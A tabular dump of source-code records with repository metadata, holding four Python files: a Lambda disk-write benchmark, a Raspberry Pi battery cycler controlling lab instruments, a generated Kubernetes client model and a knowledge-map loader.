hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a10f44ad6fe4307baa0cd97a8b555c0dab7c1fa
| 442
|
py
|
Python
|
evaluations/alg/App4/functions/f1/lambda_function.py
|
pacslab/SLApp-PerfCost-MdlOpt
|
9b9fb13b9e914a7fe5c89da570bd95baff73276e
|
[
"MIT"
] | 8
|
2020-08-07T02:03:02.000Z
|
2022-03-02T10:27:14.000Z
|
evaluations/alg/App5/functions/f1/lambda_function.py
|
pacslab/SLApp-PerfCost-MdlOpt
|
9b9fb13b9e914a7fe5c89da570bd95baff73276e
|
[
"MIT"
] | null | null | null |
evaluations/alg/App5/functions/f1/lambda_function.py
|
pacslab/SLApp-PerfCost-MdlOpt
|
9b9fb13b9e914a7fe5c89da570bd95baff73276e
|
[
"MIT"
] | 4
|
2020-08-24T14:35:41.000Z
|
2021-04-23T18:57:45.000Z
|
import json
import os
def lambda_handler(event, context):
    """AWS Lambda handler: disk I/O micro-benchmark on /tmp.

    Removes any previous 1 MiB scratch file, then rewrites 1 MiB of random
    bytes 50 times (each 'wb' open truncates, so the file stays 1 MiB while
    50 MiB total is pushed through the filesystem and fsync'd).

    :param event: Lambda event payload (unused).
    :param context: Lambda context object (unused).
    :return: dict with statusCode 200 and a JSON body reporting whether the
        scratch file already existed when the handler started.
    """
    path = '/tmp/1MB'
    file_indicator = os.path.isfile(path)
    if file_indicator:
        os.remove(path)
    for _ in range(50):
        # Context manager guarantees the descriptor is closed even if a
        # write fails; the original leaked it on any exception.
        with open(path, 'wb') as f:
            f.write(os.urandom(1048576))
            f.flush()
            os.fsync(f.fileno())  # force the bytes to physical storage
    return {
        'statusCode': 200,
        'body': json.dumps({'name': 'f1', '1MB': file_indicator})
    }
| 21.047619
| 63
| 0.547511
|
4a10f50647df774bccb47523d3818a38feb933eb
| 16,191
|
py
|
Python
|
software/validation.py
|
DeltaLabo/battery_characterizer
|
c9fa22687570a80fcf7131faa932c585fa053cf1
|
[
"MIT"
] | null | null | null |
software/validation.py
|
DeltaLabo/battery_characterizer
|
c9fa22687570a80fcf7131faa932c585fa053cf1
|
[
"MIT"
] | null | null | null |
software/validation.py
|
DeltaLabo/battery_characterizer
|
c9fa22687570a80fcf7131faa932c585fa053cf1
|
[
"MIT"
] | null | null | null |
'''
@file Ciclador de baterías
@author Diego Fernández Arias
@author Juan J. Rojas
@date Sep 28 2021
Instituto Tecnológico de Costa Rica
Laboratorio Delta
'''
import pyvisa
import numpy as np
import controller2
import time
from time import sleep
import threading
import pandas as pd
from datetime import datetime
import math
import RPi.GPIO as GPIO
import board
import digitalio
import adafruit_max31855
# GPIO.cleanup()  # NOTE: move cleanup to the end of the program
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)  # BCM pin numbering
GPIO.setup(17,GPIO.OUT) #Pin #17 RPi - relay output
GPIO.setup(18,GPIO.OUT) #Pin #18 RPi - relay output
GPIO.output(17, GPIO.LOW)
GPIO.output(18,GPIO.LOW)
GPIO.setup(24, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) #Change of State Button
GPIO.setup(22, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) #Shutdown Button
########################## 'controller2' instrument definition ##################################
#rm = pyvisa.ResourceManager()
#print(rm.list_resources())
#fuente = rm.open_resource(rm.list_resources()[1])
#fuente.write_termination = '\n'
#fuente.read_termination = '\n'
rm = pyvisa.ResourceManager()
print(rm.list_resources()[1])
# Scan the first three VISA resources and bind the electronic load (DL3021)
# and the power supply (SPD1305X) by substring match on the resource name.
# NOTE(review): assumes at least 3 resources are present — confirm.
for i in range(3):
    if rm.list_resources()[i].find("DL3A21") > 0:
        carga = rm.open_resource(rm.list_resources()[i])
        print("Carga DL3A21 encontrada")
        print(carga.query("*IDN?"))
    elif rm.list_resources()[i].find("SPD13") > 0:
        fuente = rm.open_resource(rm.list_resources()[i])
        print("Fuente SPD1305X encontrada")
        #print("Fuente SPD1305X encontrada")
    #else:
        #print("No se ha detectado la fuente o la carga")
Fuente = controller2.Fuente(fuente, "SPD1305", tipoFuente = True) # "SPD" parameter to iterate when more resources exist
Carga = controller2.Carga(carga, "DL3021")
#############################################################################################
# rm = pyvisa.ResourceMana"Power"ger()
# print(rm.list_resources()) #Returns the resources (supply and load)
# fuente = rm.open_resource(rm.list_resources()[0])
# #print(fuente.query("*IDN?")) #Verify order of the supply and load
# Fuente = controller2.Fuente(fuente, "Diego") #'Diego' parameter to iterate when more resources exist
# Define the output record structure (one row appended per measurement tick)
outputCSV = pd.DataFrame(columns = ["Timestamp", "Time", "Voltage", "Current", "Capacity", "Temperature"])
############### Read needed csv files ###############
df = pd.read_csv('/home/pi/Repositories/battery_characterizer/software/prueba_inputs.csv', header=0)
powd = pd.read_csv('/home/pi/Repositories/battery_characterizer/bat_data/bat40.csv')
# modeldf = pd.read_csv('home/pi/Repositories/battery_characterizer/validation/parameters.csv')
########################################################################
# Global variables used inside each state-machine function
state = "INIT"
channel = df.iloc[0,0] #[row,column] channel global variable (Channel 1 by default)
volt = 1.0
current = 1.0
power = 1.0
timer_flag = 0      # set by ISR once per second; cleared by state handlers
init_flag = 1       # 1 -> run one-time setup on next state entry
mintowait = 0
prev_state = 0
next_state_flag = 0
cycles = 0
counter = 0
cycle_counter = 0
past_time = datetime.now()
past_curr = 0       # previous current sample, for trapezoidal integration
capacity = 0
tempC = 0
seconds = 0.0       # elapsed profile time
end_flag = 0        # 1 -> main loop exits
charge_only = 0
######
# Initial values #
i_0 = 0 # The capacitor behaves as a short circuit
z_0 = 0.9835 # How is z chosen from the cell voltage? -- open question from the author
v_0 = 4.15 # interpolation() Is it equal to OCV at the first instant?
#dt = 1 # 1 s delta time
Q = 3.20347 # Capacity in Ah
#n = 1 # Efficiency (should differ between charge and discharge)
####
file_date = datetime.now().strftime("%d_%m_%Y_%H_%M")
spi = board.SPI()
cs = digitalio.DigitalInOut(board.D5)
max31855 = adafruit_max31855.MAX31855(spi, cs)  # thermocouple amplifier
# Cambiar por la generic interpolation #
def sec_interpolation(sec_data, pow_data, sec_in):
    """Piecewise-linear lookup of power at time ``sec_in``.

    ``sec_data`` (seconds, assumed sorted ascending) and ``pow_data``
    (power) are parallel sequences, e.g. the ``time``/``power`` columns of
    the profile CSV. Values outside the sampled range are clamped to the
    first/last sample (no extrapolation), matching the original behavior.

    Fixes: the original re-checked both bounds inside every loop iteration
    and raised UnboundLocalError for tables with fewer than two samples;
    bounds checks are hoisted out of the loop and a single-sample table
    returns that sample.
    """
    last = len(sec_data) - 1
    # Clamp below the sampled range (also covers a one-sample table).
    if last <= 0 or sec_in < sec_data[0]:
        return pow_data[0]
    # Clamp above the sampled range.
    if sec_in > sec_data[last]:
        return pow_data[last]
    for i in range(last):
        if sec_data[i] <= sec_in <= sec_data[i + 1]:
            frac = (sec_in - sec_data[i]) / (sec_data[i + 1] - sec_data[i])
            return pow_data[i] + (pow_data[i + 1] - pow_data[i]) * frac
def interpolation(x_data, y_data, x_in):  # Use with R0, R1, C1
    """Generic piecewise-linear interpolation of ``y_data`` over ``x_data``.

    ``x_data`` is assumed sorted ascending. Out-of-range inputs are clamped
    to the first/last y value (the original TODO suggested extrapolation;
    clamping behavior is preserved here).

    Fixes: bounds checks hoisted out of the per-segment loop, and a table
    with fewer than two samples no longer raises UnboundLocalError.
    """
    last = len(x_data) - 1
    if last <= 0 or x_in < x_data[0]:
        return y_data[0]  # clamp low (TODO: replace with extrapolation)
    if x_in > x_data[last]:
        return y_data[last]  # clamp high (TODO: replace with extrapolation)
    for i in range(last):
        if x_data[i] <= x_in <= x_data[i + 1]:
            # Standard two-point linear interpolation on segment [i, i+1].
            frac = (x_in - x_data[i]) / (x_data[i + 1] - x_data[i])
            return y_data[i] + (y_data[i + 1] - y_data[i]) * frac
##########################Se define el diccionario con los estados##################################
#Primero se definirá la base de la máquina de estados (utilizando diccionapandas append csvrios)
def statemachine(entry):
    """Run one tick of the cycler state machine.

    Looks up the handler registered for the current global ``state``
    ("INIT", "CHARGE", "DISCHARGE" or "END") and calls it with ``entry``,
    returning whatever the handler returns.
    """
    global state
    handlers = {
        "INIT": INIT,
        "CHARGE": CHARGE,
        "DISCHARGE": DISCHARGE,
        "END": END,
    }
    handler = handlers.get(state)
    return handler(entry)
#########################Se define la función del estado inicial#####################################
def INIT(entry):
    """Initial state: prompt the operator, pick the first power state.

    On the first entry (cycles == 0) prints a banner, asks for the profile
    start time in seconds and interpolates the profile power there. Then
    asks for confirmation; on 'y' transitions to DISCHARGE (positive
    profile power) or CHARGE (negative), arms init_flag for the next state
    and resets the integration clock.
    NOTE(review): nesting reconstructed from stripped indentation — the
    confirmation prompt is assumed to run on every INIT entry, while the
    banner/seconds prompt runs only the first time; confirm against the
    original file.
    """
    global state
    global init_flag
    global cycles
    global cycle_counter
    global charge_only
    global seconds
    global int_pow
    global past_time
    if cycles == 0:
        # ASCII-art banner (reproduced byte-for-byte; runtime output).
        print ('''
 '.` `--`
-``':>rr, '<\*!-` `'
^- -\kx" '*yT! r
x: ~sKr` :uMx. y
rY !Idv' ^KZv` _w
-O: :KRu_ `*qd(` z*
TH` *MRu- `*5Eu' (O`
-dy `x66L' =PDK: !Rx
rEY _jDdvzEdr` ,d3`
TDY rEED3' ,Zd_
`hDY ^ZEw5Ey- ,ZR~
.GD}` -wDZx:ruEd* :ZE(
`.^6Eyrvx}uVwXhmdDyL#\gO?MDHIkyu}Lx)*rdDu`
`_~rLymMRDEO6EDqjkycukEDOv3@@\g@#vyDD5VVkjsKREEEDRZ3wY?>:'
_^YwXkTxr<!,-`` -PE5, ,MDI(B@@@\g@@@KrdRi` iEE( ``-,:>rv}yIk}*,`
!r\k!. 'hEd~ ^ORxu@@@@@\g@@@@8*GDI-`yER* ':^\k~`
-!. `yDRIEO*Z@@@@@@\g@@@@@#*yDMHEd= `!,
` YEDq^Q@@@@@@@*Z@@@@@@@YvRDd, ``
_!` _GEy)#@@@#O33Z#gP3H8@@@@Z^ZEY` `:"
`~r(~_` :ZEx}@@RPPMB@@@@@@@@$PPMB@Q^KDV` `-=)r^'
`:(uwzuxr<!_.` :d6*(P3GB@@@@@@@@@@@@@@@#OPPX:kDw` `'_:~*v}wkcv=`
`,>\}zGOEOMHmjdEzr(zhsmsIIhssmmmmshIXImmssT*\dD5PMdE65Xlv^:'
`.,!}DEu}uyzhKHqZEDD6ddddRDDOHKsjyu}xvmDM!-`
_ZRr ^ZEM= `YREw- `XEc
`3Rr 'TREyqEM^ `jEv
uE) ^REDP' `hR!
<Ex *ZEIMEX, 'P5`
`Zc =HDX: `rZEu- -Z}
\H` ,zEh= `?ZOx` ~O-
P= .uRz! `r5q*` u\
-I -idT, `*3G*` ,V
-\ =yI*` _xKi_ x
! ,?Yr- :xi*- '"
``-"=:` '!!_.`
''')
        # Starting offset (seconds) into the power profile.
        seconds = float(input("Segundos iniciales: \n"))
        int_pow = sec_interpolation(powd.time, powd.power, seconds)
    if input("Desea iniciar?: \n") == 'y':
        # Profile convention: positive power = discharge the cell.
        if int_pow > 0:
            state = "DISCHARGE"
        else:
            state = "CHARGE"
        init_flag = 1
        cycle_counter += 1
        past_time = datetime.now()  # reset the integration reference time
        print("Iniciando...")
def poweroff(channel):
    """Shut everything down: open both relays, turn off the power-supply
    channel and the electronic load, and force the state machine to END.

    Also registered as the GPIO callback for the shutdown button on pin 22;
    NOTE(review): GPIO passes the *pin number* as ``channel`` in that case,
    which is then forwarded to Fuente.apagar_canal — confirm this is
    intended.
    """
    global state
    global end_flag
    GPIO.output(17, GPIO.LOW)   # open charge-path relay
    GPIO.output(18, GPIO.LOW)   # open discharge-path relay
    Fuente.apagar_canal(channel)  # power supply channel off
    Carga.apagar_carga()          # electronic load off
    print("El sistema se ha apagado")
    state = "END"
    end_flag = 1  # terminates the main while-loop
GPIO.add_event_detect(22, GPIO.RISING, callback=poweroff, bouncetime=1000)
#Interrupt Service Routine
#Executed in response to an event such as a time trigger or a voltage change on a pin
def ISR():
    """1 Hz software tick: re-arms itself via threading.Timer and raises
    ``timer_flag`` so CHARGE/DISCHARGE take one measurement per second.

    NOTE(review): the timers are never cancelled, so the chain keeps
    running until process exit.
    """
    global timer_flag
    t = threading.Timer(1.0, ISR)  # schedule the next tick in 1 s
    t.start()
    timer_flag = 1  # consumed (cleared) by the active state handler
#Thread de medición
def medicion():
    """Take one measurement sample and append it to the output CSV.

    Called once per ISR tick from CHARGE/DISCHARGE: reads V/I from the
    active instrument, reads cell temperature from the MAX31855,
    integrates capacity, prints a status line, and appends one row to
    /home/pi/cycler_data/validation<date>.csv. Trips poweroff() if the
    cell reaches 60 degC.
    """
    global volt
    global current
    global power
    global state
    global outputCSV
    global max31855
    global past_time
    global past_curr
    global capacity
    global file_date
    global seconds
    global tempC
    global channel
    global cycle_counter
    ######
    global z_0
    global i_0
    global v_0
    global Q
    tiempo_actual = datetime.now()
    deltat = (tiempo_actual - past_time).total_seconds()
    seconds += deltat  # advance the profile clock by real elapsed time
    if state == "CHARGE":
        volt,current = Fuente.medir_todo(channel) # Overwrites V,I values
        current = -current  # sign convention: charging current is negative
        n = 0.932333  # charge efficiency (used by the commented model below)
    elif state == "DISCHARGE":
        volt,current = Carga.medir_todo() # Overwrites V,I values
        n = 1  # discharge efficiency
    tempC = max31855.temperature # Measure Temp (degC)
    if tempC >= 60:
        # Hard over-temperature cutoff.
        poweroff(channel)
        print("Cuidado! La celda ha excedido la T máxima de operación")
    # Trapezoidal integration of current; 7.2 = 2 (trapezoid average) *
    # 3.6 (A*s per mAh), so `capacity` presumably accumulates in mAh —
    # TODO confirm units (the original author also flagged the 7.2).
    capacity += deltat * ((current + past_curr) / 7.2)
    past_time = tiempo_actual
    past_curr = current
    print("{:09.2f} c = {:02d} V = {:06.3f} I = {:06.3f} Q = {:07.2f} T = {:06.3f}".format(seconds, cycle_counter, volt, current, capacity, tempC))
    ##### START OF THE MODEL (disabled; kept for the pending ECM validation) #####
    # Define values for interpolation #
    # z_data = modeldf.soc.values
    # r0_data = modeldf.r0.values
    # r1_data = modeldf.r1.values
    # c1_data = modeldf.c1.values
    # # Define arrays where the interpolations will be written
    # z_r = np.array([z_0])
    # z_p = np.array([0])
    # i_R1 = np.array([0])
    # v = np.array([v_0])
    # # t = np.array([0])
    # # Discretized equations #
    # z_r = np.append(z_r, z_0 - ( (deltat*n*current)/Q ) )
    # #Model
    # ocv_p = volt + interpolation(z_data, r1_data, z_0)*i_R1 + interpolation(z_data, r0_data, z_0)*current
    # z_p = interpolation(ocv_data, z_data, ocv_p)
    # i_R1 = np.append(i_1, math.exp(-deltat / interpolation(z_data, r1_data, z_0) * interpolation(z_data, c1_data, z_0)) * (i_0) + (1 - math.exp(-deltat / (interpolation(z_data, r1_data, z_0) * interpolation(z_data, c1_data, z_0) ) ) ) * current)
    # v = np.append(v, (interpolation(z_data, ocv_data, z_0)) - (interpolation(z_data, r1_data, z_0) * (i_0)) - (interpolation(z_data, r0_data, z_0) * current))
    # z_0 = z_r[-1]
    # i_0 = i_R1[-1]
    ##### END OF THE MODEL #####
    # Create csv to write the measurements
    base = "/home/pi/cycler_data/"
    outputCSV = outputCSV.append({"Timestamp":tiempo_actual,"Time":round(seconds,2), "Voltage":volt, "Current":current, "Capacity":round(capacity,2), "Temperature":tempC}, ignore_index=True)
    filename = base + "validation" + file_date + ".csv"
    # Append only the newest row so the file grows incrementally.
    outputCSV.iloc[-1:].to_csv(filename, index=False, mode='a', header=False) #Create csv for CHARGE
    # # Create csv of the model predicted values
    # model_validation = pd.DataFrame(data={"soc_predicted":z_1, "i_r1":i_1,"v":v})
    # model_validation.to_csv('home/pi/Repositories/battery_characterizer/validation/validation.csv', index=False, mode='a', header=["soc_predicted","i_r1", "v"])
#Función para controlar módulo de relés (CH1 y CH2)
def relay_control(state):
    """Switch the relay module (CH1/CH2) to route the cell to the right
    instrument: pin 17 closes the charge path, pin 18 the discharge path.

    The opposite relay is always opened first, with a 50 ms settle delay
    between transitions, so both paths are never closed simultaneously.
    """
    # state -> (pin to open, pin to close)
    routing = {
        "CHARGE": (18, 17),     # Charge - CH1
        "DISCHARGE": (17, 18),  # Discharge - CH2
    }
    if state in routing:
        pin_off, pin_on = routing[state]
        GPIO.output(pin_off, GPIO.LOW)
        time.sleep(0.05)
        GPIO.output(pin_on, GPIO.HIGH)
        time.sleep(0.05)
################# Se define la función que hará que la batería se cargue ############################
def CHARGE (entry):
    """Charge state: CV/CC charge following the (negative) profile power.

    One-time entry setup routes the relays, enables 4-wire sensing and
    turns the supply channel on; on each 1 Hz tick it measures, looks up
    the profile power at the current time, and either keeps charging at
    the derived current or hands off to DISCHARGE / END.
    NOTE(review): nesting reconstructed from stripped indentation.
    """
    global powd
    ##
    global prev_state
    global state
    global channel
    global volt
    global current
    global power
    global capacity
    global init_flag
    global timer_flag
    global next_state_flag # STATE-CHANGE FLAG
    global past_time
    global seconds
    if init_flag == 1:
        # One-time setup on entering CHARGE.
        init_flag = 0
        relay_control(state) # route relays for CHARGE
        Fuente.toggle_4w() # enable 4-wire sensing
        Fuente.aplicar_voltaje_corriente(channel, 4.2, 0) # 4.2 V limit, 0 A to start
        Fuente.encender_canal(channel)
        time.sleep(0.1)
        timer_flag = 1 # take a first measurement immediately
    if timer_flag == 1:
        timer_flag = 0
        medicion()
        int_pow = sec_interpolation(powd.time, powd.power, seconds)
        if int_pow > 0:
            # Profile now demands discharge: release the supply first.
            state = "DISCHARGE"
            Fuente.apagar_canal(channel)
            Fuente.toggle_4w()
            init_flag = 1
        else:
            # Negative profile power -> charge current = |P| / V.
            int_curr = -int_pow / volt
            Fuente.aplicar_voltaje_corriente(channel, 4.2, int_curr)
        if seconds > powd.time[len(powd)-1]:
            # Past the end of the profile: finish.
            state = "END"
################# Se define la función que hará que la batería se descargue #########################
#Se setea el recurso de la CARGA para descargar la batería
def DISCHARGE(entry):
    """Discharge state: constant-current discharge following the profile.

    One-time entry setup routes the relays, enables remote sense and turns
    the electronic load on at 0 A; on each 1 Hz tick it measures, looks up
    the profile power, and either keeps discharging at P/V amps or hands
    off to CHARGE / END.
    NOTE(review): nesting reconstructed from stripped indentation.
    """
    global prev_state
    global state
    global channel
    global volt
    global current
    global power
    global capacity # was missing before, needed to reset C on discharge
    global init_flag
    global timer_flag
    global next_state_flag # STATE-CHANGE FLAG
    global past_time
    global seconds
    global file_date
    ###################################################################
    if init_flag == 1:
        # One-time setup on entering DISCHARGE.
        init_flag = 0
        relay_control(state) # route relays for DISCHARGE
        Carga.remote_sense(True) # enable remote sensing
        Carga.fijar_corriente(0)
        Carga.encender_carga() # single load channel (#1)
        time.sleep(0.1)
        #past_time = datetime.now()
        timer_flag = 1 # take a first measurement immediately
    if timer_flag == 1:
        timer_flag = 0
        medicion()
        int_pow = sec_interpolation(powd.time, powd.power, seconds)
        if int_pow < 0:
            # Profile now demands charge: release the load first.
            state = "CHARGE"
            Carga.apagar_carga()
            init_flag = 1
        else:
            # Positive profile power -> discharge current = P / V.
            int_curr = int_pow / volt
            Carga.fijar_corriente(int_curr)
        if seconds > powd.time[len(powd)-1]:
            # Past the end of the profile: finish.
            state = "END"
    ##################################################################
##################################################################
################ Se define la función que esperará y retornará al estado inicial ####################
####Función final. Apagará canal cuando se hayan cumplido ciclos o reiniciará
def END(entry):
    """Final state: power everything off, then either terminate the main
    loop (all cycles done) or go back to INIT for another cycle.
    """
    global cycle_counter
    global end_flag
    global state
    print("Terminó el ciclo...")
    poweroff(channel)  # note: poweroff() also sets state=END and end_flag=1
    if cycle_counter >= cycles:
        end_flag = 1  # stop the main while-loop
    else:
        state = "INIT"  # run another cycle
######################## Programa Principal (loop de la máquina de estado) ########################
# Main program: start the 1 Hz measurement tick, then spin the state
# machine until a handler (or the shutdown button) raises end_flag.
t = threading.Timer(1.0, ISR)
t.start()  # first tick fires after 1 s; ISR re-arms itself thereafter
while end_flag == 0:
    statemachine("INIT")  # the argument is unused by the handlers
print("Terminó el programa")
| 36.548533
| 247
| 0.53505
|
4a10f5eea7fdec86fcdb282fa931cae31abfe6fe
| 7,612
|
py
|
Python
|
kubernetes/client/models/v1_replication_controller_condition.py
|
mariusgheorghies/python
|
68ac7e168963d8b5a81dc493b1973d29e903a15b
|
[
"Apache-2.0"
] | null | null | null |
kubernetes/client/models/v1_replication_controller_condition.py
|
mariusgheorghies/python
|
68ac7e168963d8b5a81dc493b1973d29e903a15b
|
[
"Apache-2.0"
] | null | null | null |
kubernetes/client/models/v1_replication_controller_condition.py
|
mariusgheorghies/python
|
68ac7e168963d8b5a81dc493b1973d29e903a15b
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v1.20.7
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class V1ReplicationControllerCondition(object):
    """Model for a Kubernetes ReplicationController condition.

    NOTE: originally auto generated by OpenAPI Generator
    (https://openapi-generator.tech).

    ``openapi_types`` maps attribute name -> declared type, and
    ``attribute_map`` maps attribute name -> JSON key.
    """

    openapi_types = {
        'last_transition_time': 'datetime',
        'message': 'str',
        'reason': 'str',
        'status': 'str',
        'type': 'str'
    }

    attribute_map = {
        'last_transition_time': 'lastTransitionTime',
        'message': 'message',
        'reason': 'reason',
        'status': 'status',
        'type': 'type'
    }

    def __init__(self, last_transition_time=None, message=None, reason=None, status=None, type=None, local_vars_configuration=None):  # noqa: E501
        """V1ReplicationControllerCondition - a model defined in OpenAPI.

        ``status`` and ``type`` are required; the setters reject ``None``
        when client-side validation is enabled on the configuration.
        """
        if local_vars_configuration is None:
            local_vars_configuration = Configuration()
        self.local_vars_configuration = local_vars_configuration

        # Backing fields for the properties below.
        self._last_transition_time = None
        self._message = None
        self._reason = None
        self._status = None
        self._type = None
        self.discriminator = None

        # Optional fields are only assigned when provided.
        if last_transition_time is not None:
            self.last_transition_time = last_transition_time
        if message is not None:
            self.message = message
        if reason is not None:
            self.reason = reason
        # Required fields always go through their validating setters.
        self.status = status
        self.type = type

    @property
    def last_transition_time(self):
        """The last time the condition transitioned from one status to
        another.

        :rtype: datetime
        """
        return self._last_transition_time

    @last_transition_time.setter
    def last_transition_time(self, last_transition_time):
        """Set the last transition time of this condition."""
        self._last_transition_time = last_transition_time

    @property
    def message(self):
        """A human readable message indicating details about the
        transition.

        :rtype: str
        """
        return self._message

    @message.setter
    def message(self, message):
        """Set the human-readable transition message."""
        self._message = message

    @property
    def reason(self):
        """The reason for the condition's last transition.

        :rtype: str
        """
        return self._reason

    @reason.setter
    def reason(self, reason):
        """Set the reason for the condition's last transition."""
        self._reason = reason

    @property
    def status(self):
        """Status of the condition, one of True, False, Unknown.

        :rtype: str
        """
        return self._status

    @status.setter
    def status(self, status):
        """Set the condition status; ``None`` is rejected when client-side
        validation is enabled (the field is required).
        """
        if self.local_vars_configuration.client_side_validation and status is None:  # noqa: E501
            raise ValueError("Invalid value for `status`, must not be `None`")  # noqa: E501
        self._status = status

    @property
    def type(self):
        """Type of replication controller condition.

        :rtype: str
        """
        return self._type

    @type.setter
    def type(self, type):
        """Set the condition type; ``None`` is rejected when client-side
        validation is enabled (the field is required).
        """
        if self.local_vars_configuration.client_side_validation and type is None:  # noqa: E501
            raise ValueError("Invalid value for `type`, must not be `None`")  # noqa: E501
        self._type = type

    def to_dict(self):
        """Return the model properties as a plain dict, converting nested
        models (anything exposing ``to_dict``) one level deep inside lists
        and dict values, as the generated code does.
        """
        result = {}
        for attr in self.openapi_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = [
                    item.to_dict() if hasattr(item, "to_dict") else item
                    for item in value
                ]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {
                    key: val.to_dict() if hasattr(val, "to_dict") else val
                    for key, val in value.items()
                }
            else:
                result[attr] = value
        return result

    def to_str(self):
        """Return the pretty-printed string representation of the model."""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`."""
        return self.to_str()

    def __eq__(self, other):
        """Two conditions are equal when they are the same model type with
        equal field dictionaries.
        """
        if not isinstance(other, V1ReplicationControllerCondition):
            return False
        return self.to_dict() == other.to_dict()

    def __ne__(self, other):
        """Inverse of ``__eq__`` (non-models always compare unequal)."""
        return not self.__eq__(other)
| 32.118143
| 146
| 0.625197
|
4a10f611a449fb7d5f8243cd7ce07271218dc4ee
| 2,850
|
py
|
Python
|
reasonerAPI/python-flask-server/openapi_server/controllers/knowledge_map.py
|
codewarrior2000/molecular-data-provider
|
820b7db35cf6578f13671caaade2d48811447822
|
[
"MIT"
] | null | null | null |
reasonerAPI/python-flask-server/openapi_server/controllers/knowledge_map.py
|
codewarrior2000/molecular-data-provider
|
820b7db35cf6578f13671caaade2d48811447822
|
[
"MIT"
] | null | null | null |
reasonerAPI/python-flask-server/openapi_server/controllers/knowledge_map.py
|
codewarrior2000/molecular-data-provider
|
820b7db35cf6578f13671caaade2d48811447822
|
[
"MIT"
] | null | null | null |
import requests
import json
from contextlib import closing
from openapi_server.models.query_graph import QueryGraph
definition_file = 'transformer_chains.json'
class KnowledgeMap:
    """Predicate map: subject class -> object class -> list of predicate
    entries, built from the local transformer-chain definitions.
    """

    def __init__(self):
        # Eagerly load the static definitions at construction time.
        self.kmap = self.read_knowledge_map()

    def read_knowledge_map(self):
        """Build the map from the local ``transformer_chains.json`` file.

        :return: nested dict {subject: {object: [predicate entries]}}.
        """
        kmap = {}
        with open(definition_file, 'r') as f:
            # json.load reads the stream directly (was json.loads(f.read())).
            for chain in json.load(f):
                add_predicate(kmap, chain)
        return kmap

    def load_knowledge_map(self):
        """Build the map live from the local molecular-data-provider
        transformer registry, attaching a one-step transformer chain to
        each predicate entry.
        """
        url = 'http://localhost:9200/molecular_data_provider/transformers'
        kmap = {}
        with closing(requests.get(url)) as response_obj:
            response = response_obj.json()
            for transformer in response:
                for predicate in transformer['knowledge_map']['predicates']:
                    predicate['transformer_chain'] = transformer_as_chain(transformer)
                    add_predicate(kmap, predicate)
        return kmap

    def predicates(self):
        """Return {subject: {object: [unique predicate names]}}."""
        return {
            subject: {
                object: list({predicate['predicate'] for predicate in predicates})
                for (object, predicates) in objects.items()
            }
            for (subject, objects) in self.kmap.items()
        }

    def get_transformers(self, subject_class, predicate, object_class):
        """Return the predicate entries linking ``subject_class`` to
        ``object_class``; ``predicate=None`` acts as a wildcard.
        """
        candidates = self.kmap.get(subject_class, {}).get(object_class, [])
        return [
            transformer for transformer in candidates
            if predicate is None or predicate == transformer['predicate']
        ]

    def match_query_graph(self, query_graph: 'QueryGraph'):
        """Match the (single-edge) query graph against the knowledge map.

        :return: (edge dict, list of matching transformer entries).
        """
        nodes = {node.id: node for node in query_graph.nodes}
        # Only the first edge of the query graph is considered.
        query_edge = query_graph.edges[0]
        source = nodes[query_edge.source_id]
        target = nodes[query_edge.target_id]
        # `edge_id` instead of shadowing the builtin `id`.
        edge_id = query_edge.id
        edge = {'id': edge_id, 'source': source, 'type': query_edge.type, 'target': target}
        return (edge, self.get_transformers(source.type, query_edge.type, target.type))
def transformer_as_chain(transformer):
    """Wrap a single transformer description as a one-element chain.

    Each parameter becomes a control: parameters bound to a biolink class
    take the placeholder '#subject', all others keep their default value.
    """
    controls = [
        {
            'name': parameter['name'],
            'value': '#subject' if parameter['biolink_class'] is not None
            else parameter['default'],
        }
        for parameter in transformer['parameters']
    ]
    return [{'name': transformer['name'], 'controls': controls}]
def add_predicate(kmap, predicate):
    """Insert *predicate* into the nested subject -> object -> list map,
    creating the intermediate levels on demand.
    """
    subject_map = kmap.setdefault(predicate['subject'], {})
    subject_map.setdefault(predicate['object'], []).append(predicate)
# Module-level singleton; reads transformer_chains.json at import time.
knowledge_map = KnowledgeMap()
| 31.318681
| 90
| 0.635088
|
4a10f6ee3a7fee2a370af87a5990aa70c2e24c86
| 6,065
|
py
|
Python
|
plotResults.py
|
mandoway/dfp
|
d8b1bd911fa810ce08e9719c9988e5a765b0128b
|
[
"Apache-2.0"
] | null | null | null |
plotResults.py
|
mandoway/dfp
|
d8b1bd911fa810ce08e9719c9988e5a765b0128b
|
[
"Apache-2.0"
] | null | null | null |
plotResults.py
|
mandoway/dfp
|
